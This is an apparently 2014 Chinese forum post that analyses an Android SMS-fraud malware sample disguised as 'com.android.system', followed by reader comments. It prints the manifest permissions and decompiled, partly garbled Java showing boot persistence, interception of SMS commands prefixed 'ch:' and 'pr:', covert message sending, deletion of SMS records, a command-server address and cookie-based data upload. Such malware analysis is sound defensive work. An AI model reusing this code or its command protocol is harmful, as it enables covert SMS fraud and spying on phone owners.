apk病毒样本分析
一.基本信息文件名称:Update.apkMD5:396ecd933e52403c645c1241de501696Sha-1:29051ca16672b9cb2b5940cc2e0d8feeb6a51262应用名称:Audience文件包名:com.android.system二.AndroidManifest.xml <receiver android:label="@string/app_name" android:name=".Audiencer">
<intent-filter android:priority="2147483647">
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
<service android:name=".Audience" />//启动的服务
</application>
<uses-permission android:name="android.permission.INTERNET" />//联网
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />//访问网络状态
<uses-permission android:name="android.permission.WRITE_APN_SETTINGS" />//改写APN设置
<uses-permission android:name="android.permission.WRITE_APN_SETTING" />
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />//访问wifi
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//开机开启广播
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />//读信息
<uses-permission android:name="android.permission.WRITE_SMS" />//写信息
<uses-permission android:name="android.permission.SEND_SMS" />//发信息
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />//监视,修改有关拨出电话
<uses-permission android:name="android.permission.WAKE_LOCK" />//手机屏幕关闭后后台进程仍然运行
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />//挂载、反挂载外部文件系统
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />//写sd卡
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
<uses-permission android:name="android.permission.READ_LOGS" />//读取系统日志
<uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />//关闭后台程序
<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启程序
<uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态
</manifest>
三.分析1)安装完后,重新开机,验证其具有开机启动,启动对象为.Audiencer,伪装包名为:com.android.system
http://www.52pojie.cn/forum.php?mod=image&aid=271543&size=300x300&key=c31da3bf5709cec5&nocache=yes&type=fixnone同时具有:屏幕关闭时启动服务,监控短信(收到短信)启动服务2)BroadcastReceiver:Audiencerpublic void onReceive(Context paramContext, Intent paramIntent)
{
int i = 0;
Log.e(Audiencer.class.getSimpleName(), paramIntent.getAction());
if (this.a == null)
{
this.a = new Intent();
this.a.setClass(paramContext, Audience.class);//启动 Audience服务
}
if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))//当接受到短信时
{
Object[] arrayOfObject = (Object[])paramIntent.getExtras().get("pdus");
SmsMessage[] arrayOfSmsMessage;
if ((arrayOfObject != null) && (arrayOfObject.length > 0))
arrayOfSmsMessage = new SmsMessage;
for (int j = 0; ; j++)
{
if (j >= arrayOfObject.length)
{
int k = arrayOfSmsMessage.length;
if (i < k)
break;
return;
}
arrayOfSmsMessage = SmsMessage.createFromPdu((byte[])arrayOfObject);
}
SmsMessage localSmsMessage = arrayOfSmsMessage;
String str1 = localSmsMessage.getMessageBody();
String str2 = localSmsMessage.getOriginatingAddress();
if (str1.startsWith("ch:"))//监听 拦截短信内容以 “ch:”开始的短信,获得网址,写入数据库
{
Audience.e().a(str1.substring(3));
abortBroadcast();
return;
}
if (str1.startsWith("pr:"))//拦截短信内容以 “pr:” 开始的短信,记录mobile号码
{
Audience.e().b(str1.substring(3));//记录接受到每1位mobile号,写入HashMap中,最后写入数据库abortBroadcast();return;}Audience.e().c().a("SmsReceiver mobile:" + str2 + "content:" + str1);if (Audience.e().k().a(str2, str1, null))//str2为电话号码,str1为信息内容{System.out.println("need response");Audience.e().k().b(str1);//str1为信息内容switch (Audience.e().k().a().g()){ case 3: default: case 0: case 1: case 2:}} while (true) { i++; break; abortBroadcast(); continue; abortBroadcast(); continue; abortBroadcast(); if (!Audience.e().k().a().a(str2, str1)) continue; a.a.f.a(Audience.e().k().a().a(str2), Audience.e().k().a(str1));//发送信息 } } Log.e("Process", "service is:" + Audience.e()); if (Audience.e() != null) if ("android.intent.action.SCREEN_ON".equals(paramIntent.getAction()))//屏幕打开时 Log.e("Receiver", "Screen_ON"); while (true) { try { Audience.e().o(); } catch (Exception localException1) { try { if (!Audience.a) continue; Audience.e().m(); if (Audience.a) break; Log.e("Process", "Start Service By Dial Or Start up"); paramContext.startService(this.a); return; localException1 = localException1; localException1.printStackTrace(); continue; } catch (Exception localException2) { localException2.printStackTrace(); continue; } } if (!"android.intent.action.SCREEN_OFF".equals(paramIntent.getAction()))//屏幕关闭时 continue; Log.e("Receiver", "Screen_OFF"); if (Audience.a) { paramContext.startService(this.a);//屏幕关闭时,启动服务 Log.e("Process", "Start Service"); } Audience.e().l(); continue; if (!Audience.a) continue; Log.e("Process", "Start Service By Dial Or Start up"); paramContext.startService(this.a); }
}
{
3)拦截信息,获取记录接受到每1位mobile号public final void b(String paramString)//记录接受到每1位mobile号
{
StringBuffer localStringBuffer = new StringBuffer();
int i1 = 0;
if (i1 >= paramString.length())
{
c(localStringBuffer.toString());
return;
}
int i2 = paramString.charAt(i1);
if (i2 == 97)
localStringBuffer.append('0');
while (true)
{
i1++;
break;
if (i2 == 98)
{
localStringBuffer.append('1');
continue;
}
if (i2 == 99)
{
localStringBuffer.append('2');
continue;
}
if (i2 == 100)
{
localStringBuffer.append('3');
continue;
}
if (i2 == 101)
{
localStringBuffer.append('4');
continue;
}
if (i2 == 102)
{
localStringBuffer.append('5');
continue;
}
if (i2 == 103)public final void b(String paramString)//paramString为信息内容
{
Log.e("waitForSmsJob", this.c);
if (this.c != null)
{
if ((this.a.l() == null) || (this.a.l().trim().length() == 0))
this.c.a(this.d);
}
else
return;
this.c.a(c(paramString));//j.a(c(paramString))////paramString为信息内容,//等待接收消息,对信息内容处理
}
{
localStringBuffer.append('6');
continue;
}
if (i2 == 104)
{
localStringBuffer.append('7');
continue;
}
if (i2 == 105)
{
localStringBuffer.append('8');
continue;
}
if (i2 != 106)
continue;
localStringBuffer.append('9');
}
3)对接收到的命令信息执行:public final void b(String paramString)//paramString为信息内容
{
Log.e("waitForSmsJob", this.c);
if (this.c != null)
{
if ((this.a.l() == null) || (this.a.l().trim().length() == 0))
this.c.a(this.d);
}
else
return;
this.c.a(c(paramString));//j.a(c(paramString))////paramString为信息内容,//等待接收消息,对信息内容处理
}
4)数据库Audience.db进行信息记录 public final void onCreate(SQLiteDatabase paramSQLiteDatabase)
{
a("DBOpenHelper onCreate");
try
{
paramSQLiteDatabase.execSQL("CREATE TABLE IF NOT EXISTS sysapp (_id integer primary key, config varchar (2048))");
this.b.put("next_work_time", Audience.e().j());
this.b.put("next_work_time2", "86400");
Map localMap = this.b;
Random localRandom = new Random();
StringBuffer localStringBuffer1 = new StringBuffer("");
int i = 0;
ContentValues localContentValues;
StringBuffer localStringBuffer2;
Iterator localIterator;
if (i >= 18)
{
localMap.put("pid", localStringBuffer1.toString());//各种响应回复命令
this.b.put("response_to_who", "");
this.b.put("reply_response_to_who", "");
this.b.put("reply_response_to_what", "");
this.b.put("response_type", "3");
this.b.put("remain_time", "0");
this.b.put("mobile", "");
this.b.put("start_time", "0");
this.b.put("response_to_what", "");
this.b.put("change_to_who", "");
this.b.put("change_to_what", "");
this.b.put("reply_who", "");
this.b.put("reply_what", "");
this.b.put("content_cutter", "");
this.b.put("heart_beat", "0");
this.b.put("heart_beat_last_work", "0");
this.b.put("heart_beat_last_work2", "0");
this.b.put("heart_beat_start_block", "0");
this.b.put("fee_host", "post://g.kong-mobile.com:8000/g");
this.b.put("work_count", "0");
this.b.put("phs", "YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZ");
localContentValues = new ContentValues();
localContentValues.put("_id", Integer.valueOf(1));
localStringBuffer2 = new StringBuffer();
localIterator = this.b.entrySet().iterator();
}
while (true)
{
if (!localIterator.hasNext())
{
localContentValues.put("config", localStringBuffer2.toString());
paramSQLiteDatabase.insert("sysapp", null, localContentValues);
a("DBOpenHelper.onCreate " + localStringBuffer2.toString());
return;
localStringBuffer1.append(localRandom.nextInt(10));
i++;
break;
}
Map.Entry localEntry = (Map.Entry)localIterator.next();
if (localStringBuffer2.length() != 0)
localStringBuffer2.append("");
localStringBuffer2.append((String)localEntry.getKey()).append("[=]").append((String)localEntry.getValue());
}
}
catch (Exception localException)
{
a("DBOpenHelper.onCreate " + localException.toString());
}
}
对应数据库表sysapp记录各种操作信息:next_work_time2[=]86400response_to_what[=]work_count[=]2reply_response_to_who[=]heart_beat_start_block[=]0reply_response_to_what[=]pid[=]880085661072784632heart_beat[=]374remain_time[=]0response_to_who[=]next_work_time[=]180heart_beat_last_work[=]374fee_host[=]post://g.kong-mobile.com:8000/gcontent_cutter[=]response_type[=]3phs[=]YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZchange_to_who[=]reply_what[=]reply_who[=]change_to_what[=]heart_beat_last_work2[=]0start_time[=]0mobile[=]
5)模块a/a/f有对信息的 修改,删除操作等: paramContentResolver.delete(Uri.parse("content://sms"), " _id = " + paramInt, null);paramContentResolver.update(Uri.parse("content://sms"), localContentValues, " _id = " + paramInt, null);6)a/b/b模块具有联网,以cookies形式上传信息 操作setRequestProperty("Cookie", localStringBuffer.toString());
简单分析,大牛勿喷{:301_1007:} 不错,吾爱有你更精彩 学习了感谢分享经验 谢谢楼主分享技术分析,我受益匪浅 安卓的病毒就是多 大神 膜拜 宿命棋局 发表于 2014-4-20 08:53
不错,吾爱有你更精彩
谢谢。。。。。。。。。 还利用安卓的漏洞 隐藏了在应用程序里面的包 我的手机就会莫名其妙的发短信 学习学习 。。。
页:
[1]
2